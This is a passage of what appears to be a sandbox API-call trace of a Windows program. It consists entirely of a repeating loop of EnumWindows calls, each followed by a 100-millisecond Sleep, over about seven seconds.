(lpEnumFunc=0x423dd0, lParam=0x410000) [0213.471] Sleep (dwMilliseconds=0x64) [0213.473] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.474] Sleep (dwMilliseconds=0x64) [0213.475] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.476] Sleep (dwMilliseconds=0x64) [0213.479] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.480] Sleep (dwMilliseconds=0x64) [0213.481] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.482] Sleep (dwMilliseconds=0x64) [0213.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.484] Sleep (dwMilliseconds=0x64) [0213.486] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.487] Sleep (dwMilliseconds=0x64) [0213.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.488] Sleep (dwMilliseconds=0x64) [0213.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.490] Sleep (dwMilliseconds=0x64) [0213.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.492] Sleep (dwMilliseconds=0x64) [0213.494] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.494] Sleep (dwMilliseconds=0x64) [0213.496] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.496] Sleep (dwMilliseconds=0x64) [0213.498] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.498] Sleep (dwMilliseconds=0x64) [0213.500] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.500] Sleep (dwMilliseconds=0x64) [0213.511] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.512] Sleep (dwMilliseconds=0x64) [0213.513] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.514] Sleep (dwMilliseconds=0x64) [0213.515] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.516] Sleep (dwMilliseconds=0x64) [0213.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.522] Sleep (dwMilliseconds=0x64) [0213.524] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.524] Sleep (dwMilliseconds=0x64) [0213.526] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.526] Sleep (dwMilliseconds=0x64) [0213.528] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.528] Sleep (dwMilliseconds=0x64) [0213.530] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.531] Sleep (dwMilliseconds=0x64) [0213.532] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.533] Sleep (dwMilliseconds=0x64) [0213.534] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.535] Sleep (dwMilliseconds=0x64) [0213.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.537] Sleep (dwMilliseconds=0x64) [0213.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.539] Sleep (dwMilliseconds=0x64) [0213.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.541] Sleep (dwMilliseconds=0x64) [0213.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.543] Sleep (dwMilliseconds=0x64) [0213.544] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.545] Sleep (dwMilliseconds=0x64) [0213.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.547] Sleep (dwMilliseconds=0x64) [0213.549] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.549] Sleep (dwMilliseconds=0x64) [0213.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.551] Sleep (dwMilliseconds=0x64) [0213.553] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.576] Sleep (dwMilliseconds=0x64) [0213.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.584] Sleep (dwMilliseconds=0x64) [0213.619] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.621] Sleep (dwMilliseconds=0x64) [0213.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.654] Sleep (dwMilliseconds=0x64) [0213.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.661] Sleep (dwMilliseconds=0x64) [0213.698] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.699] Sleep (dwMilliseconds=0x64) [0213.736] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.738] Sleep (dwMilliseconds=0x64) [0213.745] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.746] Sleep (dwMilliseconds=0x64) [0213.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.779] Sleep (dwMilliseconds=0x64) [0213.826] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.828] Sleep (dwMilliseconds=0x64) [0213.838] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.839] Sleep (dwMilliseconds=0x64) [0213.866] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.867] Sleep (dwMilliseconds=0x64) [0213.903] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.904] Sleep (dwMilliseconds=0x64) [0213.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.930] Sleep (dwMilliseconds=0x64) [0213.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.943] Sleep (dwMilliseconds=0x64) [0213.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0213.984] Sleep (dwMilliseconds=0x64) [0214.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.026] Sleep (dwMilliseconds=0x64) [0214.028] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.028] Sleep (dwMilliseconds=0x64) [0214.064] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.065] Sleep (dwMilliseconds=0x64) [0214.103] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.107] Sleep (dwMilliseconds=0x64) [0214.143] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.145] Sleep (dwMilliseconds=0x64) [0214.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.179] Sleep (dwMilliseconds=0x64) [0214.291] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.292] Sleep (dwMilliseconds=0x64) [0214.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.335] Sleep (dwMilliseconds=0x64) [0214.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.373] Sleep (dwMilliseconds=0x64) [0214.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.443] Sleep (dwMilliseconds=0x64) [0214.451] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.452] Sleep (dwMilliseconds=0x64) [0214.491] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.493] Sleep (dwMilliseconds=0x64) [0214.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.532] Sleep (dwMilliseconds=0x64) [0214.539] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.540] Sleep (dwMilliseconds=0x64) [0214.570] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.571] Sleep (dwMilliseconds=0x64) [0214.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.608] Sleep (dwMilliseconds=0x64) [0214.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.627] Sleep (dwMilliseconds=0x64) [0214.647] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.648] Sleep (dwMilliseconds=0x64) [0214.687] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.688] Sleep (dwMilliseconds=0x64) [0214.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.731] Sleep (dwMilliseconds=0x64) [0214.733] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.734] Sleep (dwMilliseconds=0x64) [0214.749] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.750] Sleep (dwMilliseconds=0x64) [0214.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.787] Sleep (dwMilliseconds=0x64) [0214.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.818] Sleep (dwMilliseconds=0x64) [0214.828] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.829] Sleep (dwMilliseconds=0x64) [0214.868] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.869] Sleep (dwMilliseconds=0x64) [0214.901] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.901] Sleep (dwMilliseconds=0x64) [0214.908] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.909] Sleep (dwMilliseconds=0x64) [0214.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.945] Sleep (dwMilliseconds=0x64) [0214.985] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0214.986] Sleep (dwMilliseconds=0x64) [0215.023] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.024] Sleep (dwMilliseconds=0x64) [0215.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.063] Sleep (dwMilliseconds=0x64) [0215.064] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.065] Sleep (dwMilliseconds=0x64) [0215.101] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.102] Sleep (dwMilliseconds=0x64) [0215.139] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.146] Sleep (dwMilliseconds=0x64) [0215.187] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.188] Sleep (dwMilliseconds=0x64) [0215.226] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.228] Sleep (dwMilliseconds=0x64) [0215.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.231] Sleep (dwMilliseconds=0x64) [0215.267] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.268] Sleep (dwMilliseconds=0x64) [0215.306] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.307] Sleep (dwMilliseconds=0x64) [0215.344] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.345] Sleep (dwMilliseconds=0x64) [0215.399] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.401] Sleep (dwMilliseconds=0x64) [0215.452] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.453] Sleep (dwMilliseconds=0x64) [0215.491] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.493] Sleep (dwMilliseconds=0x64) [0215.527] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.528] Sleep (dwMilliseconds=0x64) [0215.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.531] Sleep (dwMilliseconds=0x64) [0215.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.571] Sleep (dwMilliseconds=0x64) [0215.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.603] Sleep (dwMilliseconds=0x64) [0215.608] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.609] Sleep (dwMilliseconds=0x64) [0215.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.645] Sleep (dwMilliseconds=0x64) [0215.672] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.673] Sleep (dwMilliseconds=0x64) [0215.684] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.685] Sleep (dwMilliseconds=0x64) [0215.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.724] Sleep (dwMilliseconds=0x64) [0215.743] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.744] Sleep (dwMilliseconds=0x64) [0215.764] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.765] Sleep (dwMilliseconds=0x64) [0215.807] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.810] Sleep (dwMilliseconds=0x64) [0215.844] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.845] Sleep (dwMilliseconds=0x64) [0215.852] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.855] Sleep (dwMilliseconds=0x64) [0215.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.893] Sleep (dwMilliseconds=0x64) [0215.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.933] Sleep (dwMilliseconds=0x64) [0215.936] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.936] Sleep (dwMilliseconds=0x64) [0215.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0215.973] Sleep (dwMilliseconds=0x64) [0216.016] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.017] Sleep (dwMilliseconds=0x64) [0216.047] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.050] Sleep (dwMilliseconds=0x64) [0216.089] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.090] Sleep (dwMilliseconds=0x64) [0216.101] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.102] Sleep (dwMilliseconds=0x64) [0216.131] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.132] Sleep (dwMilliseconds=0x64) [0216.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.173] Sleep (dwMilliseconds=0x64) [0216.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.190] Sleep (dwMilliseconds=0x64) [0216.221] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.222] Sleep (dwMilliseconds=0x64) [0216.258] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.259] Sleep (dwMilliseconds=0x64) [0216.265] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.266] Sleep (dwMilliseconds=0x64) [0216.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.303] Sleep (dwMilliseconds=0x64) [0216.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.341] Sleep (dwMilliseconds=0x64) [0216.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.349] Sleep (dwMilliseconds=0x64) [0216.404] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.405] Sleep (dwMilliseconds=0x64) [0216.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.458] Sleep (dwMilliseconds=0x64) [0216.476] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.477] Sleep (dwMilliseconds=0x64) [0216.513] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.515] Sleep (dwMilliseconds=0x64) [0216.553] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.554] Sleep (dwMilliseconds=0x64) [0216.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.583] Sleep (dwMilliseconds=0x64) [0216.671] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.672] Sleep (dwMilliseconds=0x64) [0216.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.712] Sleep (dwMilliseconds=0x64) [0216.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.754] Sleep (dwMilliseconds=0x64) [0216.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.772] Sleep (dwMilliseconds=0x64) [0216.805] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.844] Sleep (dwMilliseconds=0x64) [0216.872] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.873] Sleep (dwMilliseconds=0x64) [0216.886] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.888] Sleep (dwMilliseconds=0x64) [0216.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.928] Sleep (dwMilliseconds=0x64) [0216.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.967] Sleep (dwMilliseconds=0x64) [0216.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0216.988] Sleep (dwMilliseconds=0x64) [0217.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.026] Sleep (dwMilliseconds=0x64) [0217.065] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.066] Sleep (dwMilliseconds=0x64) [0217.082] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.083] Sleep (dwMilliseconds=0x64) [0217.109] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.110] Sleep (dwMilliseconds=0x64) [0217.151] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.152] Sleep (dwMilliseconds=0x64) [0217.158] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.159] Sleep (dwMilliseconds=0x64) [0217.193] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.194] Sleep (dwMilliseconds=0x64) [0217.225] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.226] Sleep (dwMilliseconds=0x64) [0217.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.252] Sleep (dwMilliseconds=0x64) [0217.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.290] Sleep (dwMilliseconds=0x64) [0217.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.320] Sleep (dwMilliseconds=0x64) [0217.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.334] Sleep (dwMilliseconds=0x64) [0217.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.373] Sleep (dwMilliseconds=0x64) [0217.443] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.444] Sleep (dwMilliseconds=0x64) [0217.456] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.457] Sleep (dwMilliseconds=0x64) [0217.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.501] Sleep (dwMilliseconds=0x64) [0217.541] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.542] Sleep (dwMilliseconds=0x64) [0217.546] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.547] Sleep (dwMilliseconds=0x64) [0217.586] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.587] Sleep (dwMilliseconds=0x64) [0217.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.627] Sleep (dwMilliseconds=0x64) [0217.628] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.629] Sleep (dwMilliseconds=0x64) [0217.666] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.667] Sleep (dwMilliseconds=0x64) [0217.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.708] Sleep (dwMilliseconds=0x64) [0217.712] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.714] Sleep (dwMilliseconds=0x64) [0217.745] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.746] Sleep (dwMilliseconds=0x64) [0217.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.781] Sleep (dwMilliseconds=0x64) [0217.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.788] Sleep (dwMilliseconds=0x64) [0217.831] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.833] Sleep (dwMilliseconds=0x64) [0217.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.865] Sleep (dwMilliseconds=0x64) [0217.870] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.870] Sleep (dwMilliseconds=0x64) [0217.909] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.910] Sleep (dwMilliseconds=0x64) [0217.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.946] Sleep (dwMilliseconds=0x64) [0217.965] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0217.968] Sleep (dwMilliseconds=0x64) [0218.023] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.024] Sleep (dwMilliseconds=0x64) [0218.042] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.043] Sleep (dwMilliseconds=0x64) [0218.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.064] Sleep (dwMilliseconds=0x64) [0218.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.101] Sleep (dwMilliseconds=0x64) [0218.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.115] Sleep (dwMilliseconds=0x64) [0218.141] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.142] Sleep (dwMilliseconds=0x64) [0218.182] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.184] Sleep (dwMilliseconds=0x64) [0218.193] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.194] Sleep (dwMilliseconds=0x64) [0218.261] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.263] Sleep (dwMilliseconds=0x64) [0218.309] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.311] Sleep (dwMilliseconds=0x64) [0218.321] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.322] Sleep (dwMilliseconds=0x64) [0218.350] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.351] Sleep (dwMilliseconds=0x64) [0218.419] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.421] Sleep (dwMilliseconds=0x64) [0218.429] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.430] Sleep (dwMilliseconds=0x64) [0218.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.461] Sleep (dwMilliseconds=0x64) [0218.499] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.500] Sleep (dwMilliseconds=0x64) [0218.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.518] Sleep (dwMilliseconds=0x64) [0218.546] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.547] Sleep (dwMilliseconds=0x64) [0218.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.586] Sleep (dwMilliseconds=0x64) [0218.599] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.600] Sleep (dwMilliseconds=0x64) [0218.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.626] Sleep (dwMilliseconds=0x64) [0218.664] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.665] Sleep (dwMilliseconds=0x64) [0218.670] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.670] Sleep (dwMilliseconds=0x64) [0218.709] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.710] Sleep (dwMilliseconds=0x64) [0218.742] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.742] Sleep (dwMilliseconds=0x64) [0218.748] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.749] Sleep (dwMilliseconds=0x64) [0218.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.786] Sleep (dwMilliseconds=0x64) [0218.815] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.816] Sleep (dwMilliseconds=0x64) [0218.826] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.827] Sleep (dwMilliseconds=0x64) [0218.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.865] Sleep (dwMilliseconds=0x64) [0218.886] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.887] Sleep (dwMilliseconds=0x64) [0218.903] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.904] Sleep (dwMilliseconds=0x64) [0218.943] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.945] Sleep (dwMilliseconds=0x64) [0218.965] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0218.965] Sleep (dwMilliseconds=0x64) [0219.032] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.033] Sleep (dwMilliseconds=0x64) [0219.070] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.071] Sleep (dwMilliseconds=0x64) [0219.091] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.092] Sleep (dwMilliseconds=0x64) [0219.109] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.110] Sleep (dwMilliseconds=0x64) [0219.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.146] Sleep (dwMilliseconds=0x64) [0219.160] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.160] Sleep (dwMilliseconds=0x64) [0219.184] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.186] Sleep (dwMilliseconds=0x64) [0219.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.224] Sleep (dwMilliseconds=0x64) [0219.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.288] Sleep (dwMilliseconds=0x64) [0219.330] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.331] Sleep (dwMilliseconds=0x64) [0219.339] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.340] Sleep (dwMilliseconds=0x64) [0219.370] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.371] Sleep (dwMilliseconds=0x64) [0219.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.439] Sleep (dwMilliseconds=0x64) [0219.459] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.460] Sleep (dwMilliseconds=0x64) [0219.480] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.481] Sleep (dwMilliseconds=0x64) [0219.517] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.518] Sleep (dwMilliseconds=0x64) [0219.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.537] Sleep (dwMilliseconds=0x64) [0219.556] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.557] Sleep (dwMilliseconds=0x64) [0219.595] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.596] Sleep (dwMilliseconds=0x64) [0219.607] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.607] Sleep (dwMilliseconds=0x64) [0219.635] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.636] Sleep (dwMilliseconds=0x64) [0219.670] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.670] Sleep (dwMilliseconds=0x64) [0219.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.673] Sleep (dwMilliseconds=0x64) [0219.709] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.710] Sleep (dwMilliseconds=0x64) [0219.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.732] Sleep (dwMilliseconds=0x64) [0219.746] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.748] Sleep (dwMilliseconds=0x64) [0219.782] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.783] Sleep (dwMilliseconds=0x64) [0219.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.794] Sleep (dwMilliseconds=0x64) [0219.819] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.821] Sleep (dwMilliseconds=0x64) [0219.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.857] Sleep (dwMilliseconds=0x64) [0219.859] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.860] Sleep (dwMilliseconds=0x64) [0219.893] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.894] Sleep (dwMilliseconds=0x64) [0219.920] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.921] Sleep (dwMilliseconds=0x64) [0219.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.933] Sleep (dwMilliseconds=0x64) [0219.971] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.972] Sleep (dwMilliseconds=0x64) [0219.995] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0219.996] Sleep (dwMilliseconds=0x64) [0220.012] 